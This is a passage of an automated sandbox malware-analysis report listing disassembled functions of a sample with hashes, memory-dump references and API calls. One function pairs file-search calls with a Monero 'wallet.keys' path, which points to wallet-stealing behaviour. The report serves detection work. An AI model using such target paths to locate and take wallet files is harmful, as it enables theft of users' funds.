                                    • Opcode Fuzzy Hash: 47124bcee734238838f01059a6be2821ae3770b84147ad5f1582509a5107c70c
                                    • Instruction Fuzzy Hash: A7B216F360C2049FE3046E2DEC8567ABBEAEFD4720F1A463DE6C5C7744EA3558058692
                                    Function 00EA4987 Relevance: 4.0, Strings: 3, Instructions: 230COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: E~$Ij}g$R:Y
                                    • API String ID: 0-3270868955
                                    • Opcode ID: cf43b8ce11d60e8bf9ae6695a7b70d56ced61658fc314e9721bd59a89b7354f1
                                    • Instruction ID: c94623ad1d1ebdea75afbc97fd799ff327a3b3c8dd5025075759b3d2b140de05
                                    • Opcode Fuzzy Hash: cf43b8ce11d60e8bf9ae6695a7b70d56ced61658fc314e9721bd59a89b7354f1
                                    • Instruction Fuzzy Hash: 69616BF3E183105BE304697CED94766B796DBD4320F1A863DDB8897784E8795C0583C6
                                    Function 01007B4C Relevance: 2.2, Strings: 1, Instructions: 968COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: `/p7
                                    • API String ID: 0-3203527995
                                    • Opcode ID: 3758b8b72a7467960c7be778fd37bad7571930dd808294aada6ae4c1310db6a7
                                    • Instruction ID: 6b6367a64d8d0084cafc05b2ffbaa6167275277d5cf5bbea2e14641d62ff1056
                                    • Opcode Fuzzy Hash: 3758b8b72a7467960c7be778fd37bad7571930dd808294aada6ae4c1310db6a7
                                    • Instruction Fuzzy Hash: A052E2F390C204AFE314AF19EC8567AFBE9EF94720F1A853DE6C483344E63558158697
                                    Function 00C3F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                      • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                      • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                      • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019D8B90,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                      • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                      • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                      • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00C515B8,00C50D96), ref: 00C3F71E
                                    • StrCmpCA.SHLWAPI(?,00C515BC), ref: 00C3F76F
                                    • StrCmpCA.SHLWAPI(?,00C515C0), ref: 00C3F785
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3FAB1
                                    • FindClose.KERNEL32(000000FF), ref: 00C3FAC3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                    • String ID:
                                    • API String ID: 3334442632-0
                                    • Opcode ID: 8082b97dca3bd7d0032f7327291d68c19389d5e0f1af7b23710db9aa0e03ea43
                                    • Instruction ID: c847c261a2556aa7f6d631c7f4c9e6085db76023e2ccb95674185a10ca5e7953
                                    • Opcode Fuzzy Hash: 8082b97dca3bd7d0032f7327291d68c19389d5e0f1af7b23710db9aa0e03ea43
                                    • Instruction Fuzzy Hash: 6A11813585410DABEB24EBA0EC55AED7378FF10300F5146A9A51A560D2EF302B4AEB92
                                    Function 00EFD5FE Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 0a^o
                                    • API String ID: 0-1632602809
                                    • Opcode ID: 072fba4b03a430cf5002e0176a7cf782473b87f1613e9cbb22b269dd11f68bf3
                                    • Instruction ID: c60d844ec83f4b727ceefaf69cf5c7fce1ec857dcda323eb14f079f6e987ccc7
                                    • Opcode Fuzzy Hash: 072fba4b03a430cf5002e0176a7cf782473b87f1613e9cbb22b269dd11f68bf3
                                    • Instruction Fuzzy Hash: E751E4B39082205BE314AA19EC4176AFBE9EF94720F17453EEEC8A3740E5754D0587D2
                                    Function 00ECA1FD Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %p}u
                                    • API String ID: 0-1487366728
                                    • Opcode ID: 2685e84e8fd21845db00eb7230f9583c863092070a84bda1bd27181ca27a9322
                                    • Instruction ID: ad8749c0a54707123156bfc3507c0a7d8c658c92ab954d8e36d4af0bfe55cbcd
                                    • Opcode Fuzzy Hash: 2685e84e8fd21845db00eb7230f9583c863092070a84bda1bd27181ca27a9322
                                    • Instruction Fuzzy Hash: 2E5116F3A092109FF3046E29EC857ABB7D6EBD4320F1A853DE6D4C3784E93948458796
                                    Function 00FFC63F Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 97?
                                    • API String ID: 0-648382171
                                    • Opcode ID: 24fed6cf9bd6923ad5ce1713b00eff0cb572519da376d2cc1bd1ed6cc32bf95c
                                    • Instruction ID: 6eeec9333e99187d3c53997250e21fd523ae4c3fd7d2650b4192210bbe8b4883
                                    • Opcode Fuzzy Hash: 24fed6cf9bd6923ad5ce1713b00eff0cb572519da376d2cc1bd1ed6cc32bf95c
                                    • Instruction Fuzzy Hash: 40517CF3A0C3099FD304BEBDFC8552BBBD9E758164F29063CEA85C2705F921DA095652
                                    Function 00FB5B2E Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: I|s_
                                    • API String ID: 0-1702182863
                                    • Opcode ID: 1cc03c3252c42c46eb3e6033cfe272536fc868e385378dbdc307c1658b43eb7a
                                    • Instruction ID: d2966b8c39da8eae4b1a2461be06b7821f562855acd28b59fbdc5f90ee02f3a5
                                    • Opcode Fuzzy Hash: 1cc03c3252c42c46eb3e6033cfe272536fc868e385378dbdc307c1658b43eb7a
                                    • Instruction Fuzzy Hash: 0F5159F3A082149FE304AE2DEC857ABB7E5EB94760F1B403DD6C883744EA75590487C6
                                    Function 00F67AEB Relevance: .2, Instructions: 238COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 085677320a2a56f5a34df5a3b91df81f312b86375ef4535c8aa5fd8b44862097
                                    • Instruction ID: 1221aead7112f6d255d73c966d450b0860da4bbc40728ed3b91b2413d5929e3e
                                    • Opcode Fuzzy Hash: 085677320a2a56f5a34df5a3b91df81f312b86375ef4535c8aa5fd8b44862097
                                    • Instruction Fuzzy Hash: 40614AF3A183045BE304AE38EC95777BBD9DB94360F2A453EEA84D7780E53989418396
                                    Function 00E9E036 Relevance: .2, Instructions: 189COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 708d910c49fb7771ed35d5e5cd5bf7f723f3e6282029feeb34011e0200fb2f16
                                    • Instruction ID: a23db97b2b3e9702ad2821e8fb0e22c0c2f341ba43d5f3ec2e21be1d57363ada
                                    • Opcode Fuzzy Hash: 708d910c49fb7771ed35d5e5cd5bf7f723f3e6282029feeb34011e0200fb2f16
                                    • Instruction Fuzzy Hash: D5515DB3E5112547F3544979CC583A2A2939BE1324F2F82788E6CAB7C6DD7E5C0A53C4
                                    Function 00F91E78 Relevance: .2, Instructions: 177COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 836ee2bad583c20309243c9172a11e8d478b94b1f09814404f681801c476150a
                                    • Instruction ID: a1d9fe06f335e99a2b6d31840eb26806712894b170f2c169db2497fe7808a0e0
                                    • Opcode Fuzzy Hash: 836ee2bad583c20309243c9172a11e8d478b94b1f09814404f681801c476150a
                                    • Instruction Fuzzy Hash: 8D5149F361D3049FE3005E29ECC47BBB7D9EB94720F294A3DE98847784E9395C058696
                                    Function 010188A1 Relevance: .1, Instructions: 107COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 465f90c8c30a93bb6a4ff3a5fbe9078bf38ca1ca1d934985e1098b4b9d313c6b
                                    • Instruction ID: 7522c2c8b9f58713d7133914af27c3ee25b705f56ca5b1fd241ff46a4c750680
                                    • Opcode Fuzzy Hash: 465f90c8c30a93bb6a4ff3a5fbe9078bf38ca1ca1d934985e1098b4b9d313c6b
                                    • Instruction Fuzzy Hash: 5831CDB251C604DFD3447E14DC4573EB7EAAB54320F1A892FEBD687204E6385A118A8B
                                    Function 01120648 Relevance: .1, Instructions: 99COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
